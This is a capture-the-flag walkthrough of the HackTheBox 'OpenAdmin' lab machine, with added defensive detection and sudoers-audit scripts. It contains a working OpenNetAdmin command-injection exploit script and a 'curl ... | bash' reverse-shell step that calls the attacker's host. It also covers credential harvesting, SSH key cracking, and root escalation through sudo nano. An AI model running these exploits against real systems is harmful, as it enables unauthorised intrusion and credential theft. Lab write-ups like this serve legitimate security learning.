# OpenAdmin

OpenAdmin is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/OpenAdmin) created by del\_KZx497Ju. In this post, my IP is 10.10.14.76, and the target’s IP is 10.129.214.71.

This machine is straightforward once you find the Admin login page. It features an outdated OpenNetAdmin CMS. From there, you get onto the machine as a low-privileged user, move to a second user with credentials found in a local application, then escalate through a sudo misconfiguration with nano.

### Gather Information

Before doing anything else, start with a ping to check that the target is reachable.

{% code title="Local Terminal" %}

```bash
ping -c 1 10.129.214.71
```

{% endcode %}

<figure><img src="/files/z1fsEeHMJkDAjPDxIrRy" alt=""><figcaption><p>Output, the TTL is close to 64 so it is a Linux related machine</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
nmap -p- --open -T5 -v -n 10.129.214.71
```

{% endcode %}

<figure><img src="/files/9jetM3S5aXPH6f4ywnx7" alt=""><figcaption><p>Nmap’s output, looks like a simple website.</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
nmap -sC -sV -p 22,80 10.129.214.71
```

{% endcode %}

<figure><img src="/files/yW6hew3tx7p1wacmYzPV" alt=""><figcaption><p>Confirms the previous statement</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
whatweb http://10.129.214.71
```

{% endcode %}

<figure><img src="/files/UOP6MYuIi47a7uqVvonP" alt=""><figcaption><p>Whatweb’s output, There is no domain.</p></figcaption></figure>

Right now the best option is to explore the website content.

* Browser: <http://10.129.214.71>

<figure><img src="/files/j2pgkPj14mJqdeoSetqf" alt=""><figcaption><p>Default page</p></figcaption></figure>

It is definitely just the Ubuntu default page, nothing special, unless you press CTRL+U.

<figure><img src="/files/6crvwB8kyecPd19J5qiV" alt=""><figcaption><p>Still, default information, there is nothing relevant at https://launchpad.net/bugs/1288690</p></figcaption></figure>

At this moment we don’t have any important information, so our best option is to search for resources. We are going to use Wfuzz with colorized output (-c) and 200 threads (-t 200), using a dictionary (-w), hiding responses with status 404 (--hc=404), and substituting each word at the FUZZ position.

{% code title="Local Terminal" %}

```bash
wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.214.71/FUZZ
```

{% endcode %}

<figure><img src="/files/zFYcNTtk8YA6um8J2wwm" alt=""><figcaption><p>Bugged output from WFuzz, will be fixed in future post.</p></figcaption></figure>

Ok, there are three payloads that make sense, let’s try with “artwork”, then “music”, and “sierra”

* Browser: <http://10.129.214.71/artwork/>

<figure><img src="/files/cWn88w6cE3LHb22n8ZS8" alt=""><figcaption><p>After exploring the website, I didn’t find anything.</p></figcaption></figure>

* Browser: <http://10.129.214.71/music>

<figure><img src="/files/2E7cJR9PbNGxwIbmAiV3" alt=""><figcaption><p>After exploring, there was something only at <strong>Login</strong>, this looks like a Content Manager</p></figcaption></figure>

<figure><img src="/files/alhPFCebjAiGqILyZKeE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/kvzOBQuk8qPwQgvn3Fss" alt=""><figcaption><p>Open Net Admin’s Interface</p></figcaption></figure>

Let’s check whether the exploit database lists any vulnerabilities for “OpenNetAdmin”.

{% code title="Local Terminal" %}

```bash
searchsploit OpenNetAdmin
```

{% endcode %}

<figure><img src="/files/C21wi16dbfAFh8Zfw74K" alt=""><figcaption><p>Part 1 from Searchsploit</p></figcaption></figure>

<figure><img src="/files/0ozda4uMh47XXo5dZY5s" alt=""><figcaption><p>Part 2 from Searchsploit</p></figcaption></figure>

### Weaponization and Exploitation

Look, there is a bash script for version 18.1.1, which means we can use that exploit. Copy the code from <https://www.exploit-db.com/exploits/47691> into a file called exploit.sh, set URL to the target’s ONA URL, and run the script.

{% code title="Exploit.sh" %}

```bash
#!/bin/bash

URL="http://10.129.214.71/ona/"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
./exploit.sh
```

{% endcode %}

<figure><img src="/files/X3zzSzcdW6WBd5TIoIWu" alt=""><figcaption><p>It works, this bash prompt will be <strong>TargetTerminal</strong> as user www-data</p></figcaption></figure>
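
Seen from the defender's side, the request sent by that script has a recognisable shape: a `window_submit` call whose `xajaxargs[]` value carries a shell separator. The following is an added example, not part of the original post or of OpenNetAdmin; it assumes request bodies are available (for instance from a proxy or WAF that logs them) as one `<client-ip> <raw form body>` line per request, and the sample lines are constructed.

```bash
#!/bin/sh
# Added example: flag request bodies that match the shape of the exploit request.
# Assumed input format: one request per line, "<client-ip> <raw form body>".

# Constructed sample input: a benign-looking request, a request with an injected
# separator, and an unrelated xajax call.
SAMPLE_BODIES='10.0.0.8 xajax=window_submit&xajaxr=1&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E10.0.0.1&xajaxargs[]=ping
10.10.14.76 xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping
10.0.0.9 xajax=display_list&xajaxargs[]=hosts'

# Prints the client IP of every window_submit request whose xajaxargs[] value
# contains a shell metacharacter, raw or percent-encoded: ; | ` $(
flag_ona_injection() {
    awk '
    {
        ip = $1
        body = $0
        sub(/^[^ ]+ /, "", body)
        # Only the window_submit handler is of interest here.
        if (index("&" body "&", "&xajax=window_submit&") == 0) next
        n = split(body, kv, "&")
        for (i = 1; i <= n; i++) {
            # Accept xajaxargs[]= and its encoded form xajaxargs%5B%5D=
            if (kv[i] !~ /^xajaxargs(\[\]|%5[Bb]%5[Dd])=/) continue
            val = kv[i]
            sub(/^[^=]*=/, "", val)
            if (val ~ /;|%3[Bb]|\||%7[Cc]|`|%60|\$\(|%24%28/) {
                print ip
                next
            }
        }
    }'
}

printf '%s\n' "$SAMPLE_BODIES" | flag_ona_injection
```
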

Now, to improve our terminal, we create an HTML file and make the target fetch it. Open two terminals, **TermA** and **TermB**.

{% code title="Local Terminal A" %}

```bash
vi index.html
python3 -m http.server 80
```

{% endcode %}

<figure><img src="/files/IgFy7FVzf33gMYIQ4j2e" alt=""><figcaption><p>Content of <strong>index.html</strong></p></figcaption></figure>

{% code title="Local Terminal B" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="Target Terminal" %}

```bash
curl 10.10.14.76 | bash
```

{% endcode %}

The target fetches the file from 10.10.14.76 and pipes it to bash.

<figure><img src="/files/ftGP9mB2ctH3jIKsXNFQ" alt=""><figcaption><p>We are in, now the TermB is <strong>TargetTerminal</strong> as <strong>www-data</strong></p></figcaption></figure>

Now our best option is to do a [TTY treatment](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md).

{% code title="Target Terminal" %}

```bash
grep -r -i -E "user|pass|key|database"
cd /home/
find -name user.txt 2>/dev/null   # Nothing, there is a permission issue
find -name user.txt
```

{% endcode %}

<figure><img src="/files/MUSKvVx7ZfHKiSskrrdJ" alt=""><figcaption></figcaption></figure>

Now we need to hunt for their passwords to log in.

{% code title="Target Terminal" %}

```bash
cd /opt/ona/www
find -type f 2>/dev/null | grep "config"
```

{% endcode %}

<figure><img src="/files/shfKeFCY4cDT8eFbPZgk" alt=""><figcaption><p>We found something with an interesting name.</p></figcaption></figure>

{% code title="Target Terminal" %}

```bash
cat ./local/config/database_settings.inc.php
```

{% endcode %}

<figure><img src="/files/H3iE9X3LhcG9knQeRNzP" alt=""><figcaption><p>Someone’s password: n1nj4W4rri0R!</p></figcaption></figure>

{% code title="Target Terminal" %}

```bash
grep "sh$" /etc/passwd
```

{% endcode %}

<figure><img src="/files/SYM1sUfrutLFdNaykuGW" alt=""><figcaption><p>List of users</p></figcaption></figure>

We have a password, so now we can test it against every user.

{% code title="Target Terminal" %}

```bash
su jimmy
```

{% endcode %}

<figure><img src="/files/LQ9QpSVh2CfYiOtCLHe9" alt=""><figcaption><p>It was Jimmy’s password, now your Target Terminal is user Jimmy</p></figcaption></figure>

<figure><img src="/files/pcxei6uLuFzGPnSErRj3" alt=""><figcaption><p>There is nothing at Jimmy’s folder</p></figcaption></figure>

{% code title="Target Terminal - Jimmy" %}

```bash
cd /var/www/internal
ls
cat main.php
```

{% endcode %}

<figure><img src="/files/HhnCanCXBQsJKTCcVjjT" alt=""><figcaption><p>Content of main.php, joanna’s id_rsa.</p></figcaption></figure>

Ok, now we are going to check the configuration.

{% code title="Target Terminal - Jimmy" %}

```bash
ls /etc/apache2/sites-available/
cat /etc/apache2/sites-available/internal.conf
```

{% endcode %}

<figure><img src="/files/TgAz8CtpZTnlj8B8Y1yU" alt=""><figcaption></figcaption></figure>

There is something listening on that port. Let’s use curl to prove it exists; if it does, that location lets us execute commands as the user “Joanna” and run main.php.

<figure><img src="/files/b1KltUkBHefBGvAPfexd" alt=""><figcaption><p>Content of reverseShell.php</p></figcaption></figure>

{% code title="Target Terminal - Jimmy" %}

```bash
curl localhost:52846/reverseShell.php
```

{% endcode %}

<figure><img src="/files/UJsq35AyEPOSyjuzeQGv" alt=""><figcaption><p>Output: Joanna</p></figcaption></figure>

That is nice to know, but we saw earlier that main.php can return the RSA private key of the user Joanna, which is an easier way.

{% code title="Target Terminal - Jimmy" %}

```bash
curl localhost:52846/main.php
```

{% endcode %}

<figure><img src="/files/WeKg1j880VPMiCLr1ULG" alt=""><figcaption><p>Copy the RSA</p></figcaption></figure>

Paste the content in a file in your local machine and open a Terminal.

{% code title="Local Terminal" %}

```bash
vi id_rsa			#paste the key inside
chmod 600 id_rsa
ssh -i id_rsa joanna@10.129.214.71
```

{% endcode %}

<figure><img src="/files/DW4KECO6lMR9bCVMxYkO" alt=""><figcaption></figcaption></figure>

But hey, it does not work. This is because the id\_rsa is encrypted, which you can see in the second row {Proc-Type: 4, ENCRYPTED}. First we need to download the tool <https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py> and decrypt the id\_rsa.

{% code title="Local Terminal" %}

```bash
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash  #password: bloodninjas
ssh -i id_rsa joanna@10.129.214.71
```

{% endcode %}

<figure><img src="/files/m1yK3MVugephg2st5Hej" alt=""><figcaption><p>Now your LocalTerm is <strong>TargetJoanna</strong></p></figcaption></figure>

{% code title="Target Terminal - Joanna" %}

```bash
ls
cat user.txt
```

{% endcode %}

<figure><img src="/files/LuN440YHZUYJ7DUdtwKj" alt=""><figcaption></figcaption></figure>

### Privilege Escalation

{% code title="Target Terminal - Joanna" %}

```bash
cd /root/		#you can't enter
id			#To see the groups
sudo -l
```

{% endcode %}

<figure><img src="/files/jDGamMNP9T1sK3jI7ZhV" alt=""><figcaption><p>File that can be executed as root using user joanna, in this case: Command <strong>nano</strong></p></figcaption></figure>

As you can see, we can run **nano** on the file /opt/priv as root without a password. Because nano can execute commands from inside the editor, this means we can execute commands as root without being asked for a password.

{% code title="Target Terminal - Joanna" %}

```bash
sudo -u root nano /opt/priv
#CTRL+R for read files, then CTRL+X to execute commands
```

{% endcode %}

<figure><img src="/files/Cs9ctTGN5WCCj7t16P6a" alt=""><figcaption><p>Command to execute</p></figcaption></figure>

<figure><img src="/files/Q6T4pe2qsyYY1fmCZqdD" alt=""><figcaption><p>Output</p></figcaption></figure>
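
The sudo rule described above is the kind of entry an audit should catch before an attacker does. The following is an added example, not part of the original post; it goes beyond nano to other editors and pagers, the program list is a short illustrative one, and the sample rules (including the `/bin/nano` path) are constructed.

```bash
#!/bin/sh
# Added example: audit sudoers-style rules for commands that give the user an
# interactive editor or pager running as another user (usually root).
# Short illustrative list; extend it for your own estate.
ESCAPE_CAPABLE="nano vi vim view ed emacs less more man"

# Constructed sample rules. The joanna line mirrors the rule described above;
# the binary path /bin/nano is an assumption.
SAMPLE_SUDOERS='# constructed sample
Defaults env_reset
joanna ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup ALL=(root) NOPASSWD: /usr/bin/rsync
ops ALL=(ALL : ALL) /usr/bin/systemctl restart apache2, /usr/bin/less /var/log/syslog'

# Reads rules on stdin, prints "<user> <command>" for each risky command.
audit_sudoers() {
    awk -v list="$ESCAPE_CAPABLE" '
    BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) risky[a[i]] = 1 }
    # Skip comments, blank lines and option lines.
    /^[ \t]*#/ || /^[ \t]*$/ || /^[ \t]*Defaults/ { next }
    {
        user = $1
        spec = $0
        sub(/^[^=]*=[ \t]*/, "", spec)        # drop "user host ="
        sub(/^\([^)]*\)[ \t]*/, "", spec)     # drop the "(runas)" part
        gsub(/[A-Z_]+:[ \t]*/, "", spec)      # drop tags such as NOPASSWD:
        m = split(spec, cmds, /,[ \t]*/)
        for (j = 1; j <= m; j++) {
            split(cmds[j], w, " ")
            k = split(w[1], p, "/")           # basename of the binary
            if (p[k] in risky) print user, cmds[j]
        }
    }'
}

printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```

Where the goal is only to let a user edit one file, a `sudoedit /opt/priv` rule runs the editor as the invoking user on a temporary copy, so the editor's command features do not run as root.
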

It works. This is a good chance to give root permissions on the **/bin/bash** file to every user.

<figure><img src="/files/NP1SkZUsSNqVSVAwBj9s" alt=""><figcaption><p>Done, and exit with CTRL + X</p></figcaption></figure>

{% code title="Target Terminal - Joanna" %}

```bash
bash -p
```

{% endcode %}

{% code title="Target Root" %}

```bash
cat root.txt
```

{% endcode %}

<figure><img src="/files/C1EJzmnAcEWv0nw2KVio" alt=""><figcaption></figcaption></figure>


